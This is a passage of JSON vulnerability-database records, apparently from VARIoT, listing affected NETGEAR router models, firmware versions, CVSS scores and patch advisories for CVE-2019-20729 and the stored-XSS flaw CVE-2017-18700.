"id": "CVE-2019-20729",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2019-20729",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2019-015388",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1340",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015388"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1340"
},
{
"db": "NVD",
"id": "CVE-2019-20729"
},
{
"db": "NVD",
"id": "CVE-2019-20729"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects JNDR3000 before 1.0.0.22, R6250 before 1.0.4.26, R6300v2 before 1.0.4.22, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R7000 before 1.0.9.28, R6900P before 1.3.1.26, R7000P before 1.3.1.26, R7300DST before 1.0.0.62, R7900 before 1.0.2.16, R8000 before 1.0.4.18, R7900P before 1.4.1.42, R8000P before 1.4.1.42, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WNDR3400v3 before 1.0.1.18, WNDR4500v2 before 1.0.0.68, and WNR3500Lv2 before 1.2.0.48. plural NETGEAR The device contains an input verification vulnerability.Information may be tampered with",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20729"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015388"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20729",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015388",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1340",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015388"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1340"
},
{
"db": "NVD",
"id": "CVE-2019-20729"
}
]
},
"id": "VAR-202004-0801",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.40264707666666666
},
"last_update_date": "2024-11-23T22:16:31.027000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Security Misconfiguration on Some Routers, PSV-2017-3120",
"trust": 0.8,
"url": "https://kb.netgear.com/000061198/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-PSV-2017-3120"
},
{
"title": "Multiple NETGEAR Product input verification error vulnerability fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116589"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015388"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1340"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-20",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015388"
},
{
"db": "NVD",
"id": "CVE-2019-20729"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://kb.netgear.com/000061198/security-advisory-for-security-misconfiguration-on-some-routers-psv-2017-3120"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20729"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20729"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015388"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1340"
},
{
"db": "NVD",
"id": "CVE-2019-20729"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015388"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1340"
},
{
"db": "NVD",
"id": "CVE-2019-20729"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015388"
},
{
"date": "2020-04-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1340"
},
{
"date": "2020-04-16T20:15:13.273000",
"db": "NVD",
"id": "CVE-2019-20729"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015388"
},
{
"date": "2020-04-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1340"
},
{
"date": "2024-11-21T04:39:12.277000",
"db": "NVD",
"id": "CVE-2019-20729"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1340"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Input verification vulnerabilities on devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015388"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1340"
}
],
"trust": 0.6
}
}
var-202004-1460
Vulnerability from variot
Certain NETGEAR devices are affected by stored XSS. This affects D6400 before 1.0.0.60, D7000 before 1.0.1.50, D8500 before 1.0.3.29, EX6200 before 1.0.3.84, EX7000 before 1.0.0.60, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R6900P before 1.3.0.8, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.56, R7900 before 1.0.1.26, R8000 before 1.0.4.4, R8300 before 1.0.2.106, R8500 before 1.0.2.106, R9000 before 1.0.2.52, WNDR3400v3 before 1.0.1.16, WNR3500Lv2 before 1.2.0.46, and WNDR3700v5 before 1.1.0.48. plural NETGEAR A cross-site scripting vulnerability exists in the device.Information may be obtained and tampered with. NETGEAR EX7000, etc. are all products of NETGEAR. NETGEAR EX7000 is a wireless network signal extender. WNR3500L is a wireless router. NETGEAR D6400 is a wireless modem. The vulnerability stems from the lack of proper verification of client data by WEB applications. Attackers can use this vulnerability to execute client code. This affects D6400 prior to 1.0.0.60, D7000 prior to 1.0.1.50, D8500 prior to 1.0.3.29, EX6200 prior to 1.0.3.84, EX7000 prior to 1.0.0.60, R6250 prior to 1.0.4.16, R6300v2 prior to 1.0.4.18, R6400 prior to 1.01.32, R6400v2 prior to 1.0.2.44, R6700 prior to 1.0.1.36, R6900 prior to 1.0.1.34, R6900P prior to 1.3.0.8, R7000 prior to 1.0.9.14, R7000P prior to 1.3.0.8, R7100LG prior to 1.0.0.34, R7300DST prior to 1.0.0.56, R7900 prior to 1.0.1.26, R8000 prior to 1.0.4.4, R8300 prior to 1.0.2.106, R8500 prior to 1.0.2.106, R9000 prior to 1.0.2.52, WNDR3400v3 prior to 1.0.1.16, WNR3500Lv2 prior to 1.2.0.46, and WNDR3700v5 prior to 1.1.0.48
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1460",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ex6200",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.84"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.60"
},
{
"model": "r9000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.60"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.29"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.16"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.01.32"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.34"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.14"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.8"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.8"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.34"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.4"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.106"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.106"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.50"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.46"
},
{
"model": "wndr3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.48"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.44"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.60"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.50"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.29"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.84"
},
{
"model": "ex7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.60"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.16"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.44"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.01.32"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.44"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "wndr3700v5",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.1.0.48"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.46"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-28010"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014967"
},
{
"db": "NVD",
"id": "CVE-2017-18700"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014967"
}
]
},
"cve": "CVE-2017-18700",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2017-18700",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2017-014967",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2020-28010",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18700",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "NONE",
"baseScore": 5.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.1,
"id": "CVE-2017-18700",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "JVNDB-2017-014967",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18700",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18700",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2017-014967",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2020-28010",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-2120",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2017-18700",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-28010"
},
{
"db": "VULMON",
"id": "CVE-2017-18700"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014967"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2120"
},
{
"db": "NVD",
"id": "CVE-2017-18700"
},
{
"db": "NVD",
"id": "CVE-2017-18700"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by stored XSS. This affects D6400 before 1.0.0.60, D7000 before 1.0.1.50, D8500 before 1.0.3.29, EX6200 before 1.0.3.84, EX7000 before 1.0.0.60, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R6900P before 1.3.0.8, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.56, R7900 before 1.0.1.26, R8000 before 1.0.4.4, R8300 before 1.0.2.106, R8500 before 1.0.2.106, R9000 before 1.0.2.52, WNDR3400v3 before 1.0.1.16, WNR3500Lv2 before 1.2.0.46, and WNDR3700v5 before 1.1.0.48. plural NETGEAR A cross-site scripting vulnerability exists in the device.Information may be obtained and tampered with. NETGEAR EX7000, etc. are all products of NETGEAR. NETGEAR EX7000 is a wireless network signal extender. WNR3500L is a wireless router. NETGEAR D6400 is a wireless modem. The vulnerability stems from the lack of proper verification of client data by WEB applications. Attackers can use this vulnerability to execute client code. This affects D6400 prior to 1.0.0.60, D7000 prior to 1.0.1.50, D8500 prior to 1.0.3.29, EX6200 prior to 1.0.3.84, EX7000 prior to 1.0.0.60, R6250 prior to 1.0.4.16, R6300v2 prior to 1.0.4.18, R6400 prior to 1.01.32, R6400v2 prior to 1.0.2.44, R6700 prior to 1.0.1.36, R6900 prior to 1.0.1.34, R6900P prior to 1.3.0.8, R7000 prior to 1.0.9.14, R7000P prior to 1.3.0.8, R7100LG prior to 1.0.0.34, R7300DST prior to 1.0.0.56, R7900 prior to 1.0.1.26, R8000 prior to 1.0.4.4, R8300 prior to 1.0.2.106, R8500 prior to 1.0.2.106, R9000 prior to 1.0.2.52, WNDR3400v3 prior to 1.0.1.16, WNR3500Lv2 prior to 1.2.0.46, and WNDR3700v5 prior to 1.1.0.48",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18700"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014967"
},
{
"db": "CNVD",
"id": "CNVD-2020-28010"
},
{
"db": "VULMON",
"id": "CVE-2017-18700"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18700",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014967",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-28010",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2120",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2017-18700",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-28010"
},
{
"db": "VULMON",
"id": "CVE-2017-18700"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014967"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2120"
},
{
"db": "NVD",
"id": "CVE-2017-18700"
}
]
},
"id": "VAR-202004-1460",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-28010"
}
],
"trust": 1.09389649375
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-28010"
}
]
},
"last_update_date": "2024-11-23T22:11:30.621000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Stored Cross-Site Scripting on Some Routers, Gateways, and Extenders, PSV-2017-0342",
"trust": 0.8,
"url": "https://kb.netgear.com/000053202/Security-Advisory-for-Stored-Cross-Site-Scripting-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0342"
},
{
"title": "Patch for Multiple NETGEAR product cross-site scripting vulnerabilities (CNVD-2020-28010)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/217301"
},
{
"title": "Multiple NETGEAR Fixes for product cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=117043"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-28010"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014967"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2120"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014967"
},
{
"db": "NVD",
"id": "CVE-2017-18700"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18700"
},
{
"trust": 1.7,
"url": "https://kb.netgear.com/000053202/security-advisory-for-stored-cross-site-scripting-on-some-routers-gateways-and-extenders-psv-2017-0342"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18700"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-28010"
},
{
"db": "VULMON",
"id": "CVE-2017-18700"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014967"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2120"
},
{
"db": "NVD",
"id": "CVE-2017-18700"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-28010"
},
{
"db": "VULMON",
"id": "CVE-2017-18700"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014967"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2120"
},
{
"db": "NVD",
"id": "CVE-2017-18700"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-28010"
},
{
"date": "2020-04-24T00:00:00",
"db": "VULMON",
"id": "CVE-2017-18700"
},
{
"date": "2020-05-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014967"
},
{
"date": "2020-04-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2120"
},
{
"date": "2020-04-24T15:15:12.363000",
"db": "NVD",
"id": "CVE-2017-18700"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-28010"
},
{
"date": "2020-04-28T00:00:00",
"db": "VULMON",
"id": "CVE-2017-18700"
},
{
"date": "2020-05-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014967"
},
{
"date": "2020-04-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2120"
},
{
